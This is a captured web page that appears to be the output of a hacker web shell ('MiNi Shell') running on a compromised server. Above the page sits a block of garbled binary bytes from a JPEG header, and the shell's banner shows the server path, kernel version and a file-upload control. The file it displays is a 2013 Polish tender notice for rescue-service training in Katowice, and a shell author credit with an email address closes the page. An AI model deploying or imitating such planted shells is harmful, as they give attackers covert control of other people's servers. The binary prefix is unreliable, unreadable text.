JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130115/21194-N-2013.html

<p class="kh_header"><b>Katowice: Wybór wykonawcy szkolenia pt. /Współdziałanie służb ratowniczych i szacowanie ryzyka związanego ze skutkami katastrof/ dla Wojewódzkiego Ośrodka Ruchu Drogowego w Katowicach,40-507 Katowice, ul. Francuska 78 dla potrzeb Projektu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pod nazwą: /PROFESJONALNY RATOWNIK GWARANCJĄ BEZPIECZEŃSTWA/</b><br>
<b>Numer ogłoszenia: 21194 - 2013; data zamieszczenia: 15.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Ośrodek Ruchu Drogowego , ul. Francuska 78, 40-507 Katowice, woj. śląskie, tel. 032 3593002, faks 032 3593001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.word.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa wojewódzka osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór wykonawcy szkolenia pt. /Współdziałanie służb ratowniczych i szacowanie ryzyka związanego ze skutkami katastrof/ dla Wojewódzkiego Ośrodka Ruchu Drogowego w Katowicach,40-507 Katowice, ul. Francuska 78 dla potrzeb Projektu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pod nazwą: /PROFESJONALNY RATOWNIK GWARANCJĄ BEZPIECZEŃSTWA/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór wykonawcy szkolenia pt. /Współdziałanie służb ratowniczych i szacowanie ryzyka związanego ze skutkami katastrof/ dla Wojewódzkiego Ośrodka Ruchu Drogowego w Katowicach,40-507 Katowice, ul. Francuska 78 dla potrzeb Projektu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pod nazwą: /PROFESJONALNY RATOWNIK GWARANCJĄ BEZPIECZEŃSTWA/
Zamówienie obejmuje przeszkolenie 40 osób w 2 grupach szkoleniowych (1 grupa = 20 osób).

Termin przeprowadzenia szkolenia:
1 grupa w okresie 01.04.2013 r. - 30.06.2013 r 
1 grupa w okresie 01.07.2013 r. - 30.09.2013 r. 
Dokładną datę oraz miejsce rozpoczęcia szkolenia Zamawiający ustali z Wykonawcą, któremu zostanie udzielone zamówienie najpóźniej 21 dni przed terminem rozpoczęcia szkolenia.

Liczba godzin zajęć teoretycznych :
1 grupa /50 h x 2 grupy = 100 h 
Liczba godzin zajęć praktycznych 
1 grupa /16 h x 2 grupy = 32 h
1 godzina zajęć teoretycznych / praktycznych = 45 minut.
1 szkolenie 50h +16 h = 66 godzin zajęć teoretycznych i praktycznych 
Szkolenia prowadzone będą wyłącznie w soboty lub niedziele. 

Szkolenie dla jednej grupy należy zorganizować  w ciągu 11 dni , a liczba godzin w danym dniu szkoleniowym nie może przekroczyć 6 godzin. . 
PROGRAM SZKOLENIA (zajęcia teoretyczne 50 h/ zajęcia praktyczne 16 h/ 1 grupa )
musi obejmować poniższe zagadnienia: 
1.podstawowe zagadnienia prawne, specyfikę zdarzeń nadzwyczajnych i klęsk żywiołowych - długotrwałość, znaczenie aspektów psychologicznych, praca pod presją mediów, zasady współpracy poszczególnych służb ratowniczych podczas akcji ratunkowej , zasady współpracy poszczególnych służb ratowniczych przy usuwaniu skutków klęsk żywiołowych, szacowanie ryzyka związanego z prawdopodobieństwem wystąpienia klęsk żywiołowych oraz ich wpływu na otoczenie i mieszkańców planowanie i racjonalne wykorzystanie zasobów do usuwania skutków klęsk żywiołowych, minimalizowanie skutków klęsk żywiołowych, zapobieganie wystąpieniu klęsk żywiołowych
2. W ramach zajęć  praktycznych należy m.in. przeprowadzić ćwiczenia (symulację działań, zdarzeń) prowadzenia akcji ratowniczych polegających na rozwiązywaniu przez uczestników problemów związanych z sytuacją kryzysową (studium przypadków np. powódź, zadanie masowe ): Uczestnicy podejmą decyzję w zależności od zaistniałej sytuacji.  
Proponowany program szkolenia Wykonawca przedstawia do zatwierdzenia  Zamawiającemu nie później niż 21 dni przed rozpoczęciem szkolenia.

Miejsce organizacji szkoleń: Wojewódzki Ośrodek Ruchu Drogowego w Katowicach przy ulicy Francuskiej 78 lub Oddziały Terenowe tj.: Dąbrowa Górnicza ul. Tysiąclecia 56, Tychy ul. Jana Pawła II 3, Bytom ul. Strzelców Bytomskich 98, Rybnik ul. Ekonomiczna 21, Jastrzębie Zdrój ul. Armii Krajowej 31. 
Wykonawca zobowiązany jest do:
przeprowadzenia szkolenia zgodnie z ustalonym terminem, harmonogramem zajęć oraz wskazaną liczbą godzin; niezwłocznego informowania Koordynatora projektu lub Specjalisty ds. szkoleń i kursów o nie zgłoszeniu się skierowanego Uczestnika Projektu na zajęcia, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć; zapewnienia podczas zajęć przerwy obiadowej (Zamawiający przewiduje catering);prowadzenia dokumentacji przebiegu szkolenia składającego się między innymi z programu i harmonogramu szkolenia, list obecności z potwierdzeniem skorzystania z cateringu według wzorów przekazanych przez Zamawiającego; przekazania Zamawiającemu oryginału prowadzonej dokumentacji wraz z protokołem zdawczo - odbiorczym z przeprowadzenia szkolenia; przedłożenia Zamawiającemu szczegółowego harmonogramu nie później niż 14 dni przed terminem rozpoczęcia szkolenia; wystawienia rachunku/faktury za wykonaną usługę w następnym tygodniu po dniu zakończenia szkolenia

Zamawiający ma prawo do: kontroli efektywności i prawidłowości przeprowadzonych zajęć; kontroli frekwencji Uczestników; kontroli, czy szkolenie prowadzone jest przez osobę uprawnioną i wskazaną w harmonogramie; wglądu do dokumentów, w tym finansowych  związanych z realizacją zamówienia; nieodpłatnego wykorzystania wizerunku Wykonawcy w materiałach promocyjno - informacyjnych w ramach realizowanego Projektu oraz zatrudnionych przez niego wykładowców.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia jeśli Wykonawca na czas realizacji zamówienia:
będzie dysponował wykonawcą/wykładowcami zdolnymi do wykonania zamówienia w celu zapewnienia właściwej realizacji programu szkolenia określonego w opisie przedmiotu zamówienia niniejszej SIWZ, przy czym każda z tych osób: 1. posiada co najmniej wykształcenie kierunkowe wyższe pożarnicze lub studia podyplomowe w zakresie zarządzania kryzysowego;
posiada praktyczną wiedzę i doświadczenie w zakresie organizacji współdziałania służb ratowniczych i szacowania ryzyka związanego ze skutkami katastrof, nabytymi poprzez wykonywanie zadań w ramach stosunku pracy przez okres co najmniej 36 miesięcy na jednym ze stanowisk: komendant, zastępca komendanta miejskiego, powiatowego , wojewódzkiego Państwowej Straży Pożarnej lub kierownik, zastępca kierownika komórki organizacyjnej właściwej w sprawach bezpieczeństwa i zarządzania kryzysowego w urzędzie miasta, starostwie powiatowym lub urzędzie wojewódzkim. 
Na potwierdzenie spełnienia warunku wiedzy i doświadczenia należy sporządzić zestawienie ilości i rodzaju akcji ratowniczych/ zdarzeń o charakterze kryzysowym, którymi wykonawca dowodził (dotyczy funkcjonariuszy Państwowej Straży Pożarnej), lub koordynował działania zmierzające do przeciwdziałania ich skutkom w ramach zadań zespołu zarządzania kryzysowego (dotyczy pracowników urzędów miejskich, starostw powiatowych, urzędów wojewódzkich). Zestawienie powinno zawierać krótki opis każdej akcji ratowniczej/ zdarzenia w którym uczestniczyły minimum 3 służby ratowniczo - porządkowe: PSP, Policja, Pogotowie Ratunkowe, oraz służby cywilne - administracja samorządowa lub rządowa potwierdzone przez kierownika odpowiedniej jednostki organizacyjnej w której akcje były prowadzone 2. jest wykładowcą lub pracownikiem dydaktycznym uczelni przedmiotu zarządzanie kryzysowe, zarządzanie sytuacją kryzysową, zarządzanie i dowodzenie w sytuacjach kryzysowych lub przedmiotów związanych z bezpieczeństwem i zarządzaniem kryzysowym  przez okres co najmniej 36 miesięcy. Na potwierdzenie spełnienia warunku wiedzy i doświadczenia należy załączyć oświadczenie potwierdzające staż pracy na stanowisku wykładowcy lub pracownika dydaktycznego ze wskazaniem nazwy uczelni, wydziału/katedry</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
a) zmiany terminów realizacji zamówienia,
b) zaistnienia omyłki rachunkowej lub pisarskiej,
c) zaistnienia siły wyższej (powódź, pożar, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy
d) wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, o których strony nie wiedziały przed zawarciem umowy, a które mają wpływ na terminy realizacji zamówienia ( zmiany harmonogramu realizacji szkoleń),
e) zmiana osoby w realizacji przedmiotu zamówienia ze względu na długotrwałe zwolnienie lekarskie, urlop lub inne przyczyny, których nie można przewidzieć w dniu zawarcia umowy z zastrzeżeniem że musi ona posiadać wykształcenie i doświadczenie zawodowe nie gorsze niż wskazane w warunkach udziału w postępowaniu. 
2 Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy. O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.word.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Ośrodek Ruchu Drogowego w Katowicach , 40-507 Katowice, ul. Francuska 78, Zamówienia Publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2013 godzina 09:00, miejsce: Wojewódzki Ośrodek Ruchu Drogowego w Katowicach , 40-507 Katowice, ul. Francuska 78, SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pod nazwą: /PROFESJONALNY RATOWNIK GWARANCJĄ BEZPIECZEŃSTWA/.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com